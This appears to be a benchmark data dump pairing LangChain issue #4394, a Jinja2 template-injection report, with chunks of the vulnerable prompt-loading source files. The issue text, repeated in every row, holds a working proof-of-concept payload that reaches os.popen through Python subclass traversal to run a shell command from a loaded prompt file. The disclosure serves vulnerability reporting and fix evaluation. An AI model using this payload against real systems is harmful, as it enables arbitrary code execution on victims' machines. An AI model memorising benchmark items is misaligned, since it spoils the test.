status
stringclasses 1
value | repo_name
stringclasses 31
values | repo_url
stringclasses 31
values | issue_id
int64 1
104k
| title
stringlengths 4
233
| body
stringlengths 0
186k
⌀ | issue_url
stringlengths 38
56
| pull_url
stringlengths 37
54
| before_fix_sha
stringlengths 40
40
| after_fix_sha
stringlengths 40
40
| report_datetime
unknown | language
stringclasses 5
values | commit_datetime
unknown | updated_file
stringlengths 7
188
| chunk_content
stringlengths 1
1.03M
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/loading.py | """Load prompts."""
import json
import logging
from pathlib import Path
from typing import Callable, Dict, Union
import yaml
from langchain.prompts.few_shot import FewShotPromptTemplate
from langchain.prompts.prompt import PromptTemplate
from langchain.schema import BaseLLMOutputParser, BasePromptTemplate, StrOutputParser
from langchain.utils.loading import try_load_from_hub
URL_BASE = "https://raw.githubusercontent.com/hwchase17/langchain-hub/master/prompts/"
logger = logging.getLogger(__name__)
def load_prompt_from_config(config: dict) -> BasePromptTemplate: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/loading.py | """Load prompt from Config Dict."""
if "_type" not in config:
logger.warning("No `_type` key found, defaulting to `prompt`.")
config_type = config.pop("_type", "prompt")
if config_type not in type_to_loader_dict:
raise ValueError(f"Loading {config_type} prompt not supported")
prompt_loader = type_to_loader_dict[config_type]
return prompt_loader(config)
def _load_template(var_name: str, config: dict) -> dict:
"""Load template from the path if applicable."""
if f"{var_name}_path" in config:
if var_name in config:
raise ValueError(
f"Both `{var_name}_path` and `{var_name}` cannot be provided."
)
template_path = Path(config.pop(f"{var_name}_path"))
if template_path.suffix == ".txt":
with open(template_path) as f:
template = f.read()
else:
raise ValueError
config[var_name] = template
return config
def _load_examples(config: dict) -> dict: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/loading.py | """Load examples if necessary."""
if isinstance(config["examples"], list):
pass
elif isinstance(config["examples"], str):
with open(config["examples"]) as f:
if config["examples"].endswith(".json"):
examples = json.load(f)
elif config["examples"].endswith((".yaml", ".yml")):
examples = yaml.safe_load(f)
else:
raise ValueError(
"Invalid file format. Only json or yaml formats are supported."
)
config["examples"] = examples
else:
raise ValueError("Invalid examples format. Only list or string are supported.")
return config
def _load_output_parser(config: dict) -> dict: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/loading.py | """Load output parser."""
if "output_parser" in config and config["output_parser"]:
_config = config.pop("output_parser")
output_parser_type = _config.pop("_type")
if output_parser_type == "regex_parser":
from langchain.output_parsers.regex import RegexParser
output_parser: BaseLLMOutputParser = RegexParser(**_config)
elif output_parser_type == "default":
output_parser = StrOutputParser(**_config)
else:
raise ValueError(f"Unsupported output parser {output_parser_type}")
config["output_parser"] = output_parser
return config
def _load_few_shot_prompt(config: dict) -> FewShotPromptTemplate: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/loading.py | """Load the "few shot" prompt from the config."""
config = _load_template("suffix", config)
config = _load_template("prefix", config)
if "example_prompt_path" in config:
if "example_prompt" in config:
raise ValueError(
"Only one of example_prompt and example_prompt_path should "
"be specified."
)
config["example_prompt"] = load_prompt(config.pop("example_prompt_path"))
else:
config["example_prompt"] = load_prompt_from_config(config["example_prompt"])
config = _load_examples(config)
config = _load_output_parser(config)
return FewShotPromptTemplate(**config)
def _load_prompt(config: dict) -> PromptTemplate:
"""Load the prompt template from config."""
config = _load_template("template", config)
config = _load_output_parser(config)
return PromptTemplate(**config)
def load_prompt(path: Union[str, Path]) -> BasePromptTemplate: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/loading.py | """Unified method for loading a prompt from LangChainHub or local fs."""
if hub_result := try_load_from_hub(
path, _load_prompt_from_file, "prompts", {"py", "json", "yaml"}
):
return hub_result
else:
return _load_prompt_from_file(path)
def _load_prompt_from_file(file: Union[str, Path]) -> BasePromptTemplate:
"""Load prompt from file."""
if isinstance(file, str):
file_path = Path(file)
else:
file_path = file
if file_path.suffix == ".json":
with open(file_path) as f:
config = json.load(f)
elif file_path.suffix == ".yaml":
with open(file_path, "r") as f:
config = yaml.safe_load(f)
else:
raise ValueError(f"Got unsupported file type {file_path.suffix}")
return load_prompt_from_config(config)
type_to_loader_dict: Dict[str, Callable[[dict], BasePromptTemplate]] = {
"prompt": _load_prompt,
"few_shot": _load_few_shot_prompt,
} |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | """Prompt schema definition."""
from __future__ import annotations
from pathlib import Path
from string import Formatter
from typing import Any, Dict, List, Optional, Union
from langchain.prompts.base import (
DEFAULT_FORMATTER_MAPPING,
StringPromptTemplate,
_get_jinja2_variables_from_template,
check_valid_template,
)
from langchain.pydantic_v1 import root_validator
class PromptTemplate(StringPromptTemplate):
"""A prompt template for a language model.
A prompt template consists of a string template. It accepts a set of parameters
from the user that can be used to generate a prompt for a language model.
The template can be formatted using either f-strings (default) or jinja2 syntax.
Example:
.. code-block:: python
from langchain.prompts import PromptTemplate
# Instantiation using from_template (recommended)
prompt = PromptTemplate.from_template("Say {foo}")
prompt.format(foo="bar")
# Instantiation using initializer
prompt = PromptTemplate(input_variables=["foo"], template="Say {foo}")
"""
@property
def lc_attributes(self) -> Dict[str, Any]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | return {
"template_format": self.template_format,
}
input_variables: List[str]
"""A list of the names of the variables the prompt template expects."""
template: str
"""The prompt template."""
template_format: str = "f-string"
"""The format of the prompt template. Options are: 'f-string', 'jinja2'."""
validate_template: bool = True
"""Whether or not to try validating the template."""
def __add__(self, other: Any) -> PromptTemplate:
"""Override the + operator to allow for combining prompt templates."""
if isinstance(other, PromptTemplate):
if self.template_format != "f-string":
raise ValueError(
"Adding prompt templates only supported for f-strings."
) |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | if other.template_format != "f-string":
raise ValueError(
"Adding prompt templates only supported for f-strings."
)
input_variables = list(
set(self.input_variables) | set(other.input_variables)
)
template = self.template + other.template
validate_template = self.validate_template and other.validate_template
partial_variables = {k: v for k, v in self.partial_variables.items()}
for k, v in other.partial_variables.items():
if k in partial_variables:
raise ValueError("Cannot have same variable partialed twice.")
else:
partial_variables[k] = v
return PromptTemplate(
template=template,
input_variables=input_variables,
partial_variables=partial_variables,
template_format="f-string",
validate_template=validate_template,
)
elif isinstance(other, str):
prompt = PromptTemplate.from_template(other)
return self + prompt
else:
raise NotImplementedError(f"Unsupported operand type for +: {type(other)}")
@property
def _prompt_type(self) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | """Return the prompt type key."""
return "prompt"
def format(self, **kwargs: Any) -> str:
"""Format the prompt with the inputs.
Args:
kwargs: Any arguments to be passed to the prompt template.
Returns:
A formatted string.
Example:
.. code-block:: python
prompt.format(variable1="foo")
"""
kwargs = self._merge_partial_and_user_variables(**kwargs)
return DEFAULT_FORMATTER_MAPPING[self.template_format](self.template, **kwargs)
@root_validator()
def template_is_valid(cls, values: Dict) -> Dict:
"""Check that template and input variables are consistent."""
if values["validate_template"]:
all_inputs = values["input_variables"] + list(values["partial_variables"])
check_valid_template(
values["template"], values["template_format"], all_inputs
)
return values
@classmethod
def from_examples( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | cls,
examples: List[str],
suffix: str,
input_variables: List[str],
example_separator: str = "\n\n",
prefix: str = "",
**kwargs: Any,
) -> PromptTemplate:
"""Take examples in list format with prefix and suffix to create a prompt.
Intended to be used as a way to dynamically create a prompt from examples.
Args:
examples: List of examples to use in the prompt.
suffix: String to go after the list of examples. Should generally
set up the user's input.
input_variables: A list of variable names the final prompt template
will expect.
example_separator: The separator to use in between examples. Defaults
to two new line characters.
prefix: String that should go before any examples. Generally includes
examples. Default to an empty string.
Returns:
The final prompt generated.
"""
template = example_separator.join([prefix, *examples, suffix])
return cls(input_variables=input_variables, template=template, **kwargs)
@classmethod
def from_file( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | cls, template_file: Union[str, Path], input_variables: List[str], **kwargs: Any
) -> PromptTemplate:
"""Load a prompt from a file.
Args:
template_file: The path to the file containing the prompt template.
input_variables: A list of variable names the final prompt template
will expect.
Returns:
The prompt loaded from the file.
"""
with open(str(template_file), "r") as f:
template = f.read()
return cls(input_variables=input_variables, template=template, **kwargs)
@classmethod
def from_template(
cls,
template: str,
*,
template_format: str = "f-string",
partial_variables: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> PromptTemplate:
"""Load a prompt template from a template.
Args:
template: The template to load.
template_format: The format of the template. Use `jinja2` for jinja2,
and `f-string` or None for f-strings.
partial_variables: A dictionary of variables that can be used to partially |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
"template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}",
"template_format": "jinja2",
"validate_template": true,
"_type": "prompt"
}
```
2. run
```python
from langchain.prompts import load_prompt
loaded_prompt = load_prompt("pt.json")
loaded_prompt.format(history="", prompt="What is 1 + 1?")
```
3. the `dir` command will be execute
attack scene: Alice can send prompt file to Bob and let Bob to load it.
analysis: Jinja2 is used to concat prompts. Template injection will happened
note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment.
### Expected behavior
code should not be execute | https://github.com/langchain-ai/langchain/issues/4394 | https://github.com/langchain-ai/langchain/pull/10252 | b642d00f9f625969ca1621676990af7db4271a2e | 22abeb9f6cc555591bf8e92b5e328e43aa07ff6c | "2023-05-09T12:28:24Z" | python | "2023-10-10T15:15:42Z" | libs/langchain/langchain/prompts/prompt.py | fill in the template. For example, if the template is
`"{variable1} {variable2}"`, and `partial_variables` is
`{"variable1": "foo"}`, then the final prompt will be
`"foo {variable2}"`.
Returns:
The prompt template loaded from the template.
"""
if template_format == "jinja2":
input_variables = _get_jinja2_variables_from_template(template)
elif template_format == "f-string":
input_variables = {
v for _, v, _, _ in Formatter().parse(template) if v is not None
}
else:
raise ValueError(f"Unsupported template format: {template_format}")
_partial_variables = partial_variables or {}
if _partial_variables:
input_variables = {
var for var in input_variables if var not in _partial_variables
}
return cls(
input_variables=sorted(input_variables),
template=template,
template_format=template_format,
partial_variables=_partial_variables,
**kwargs,
)
Prompt = PromptTemplate |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,394 | Template injection to arbitrary code execution | ### System Info
windows 11
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. save the following data to pt.json
```json
{
"input_variables": [
"prompt"
],
"output_parser": null,
"partial_variables": {},
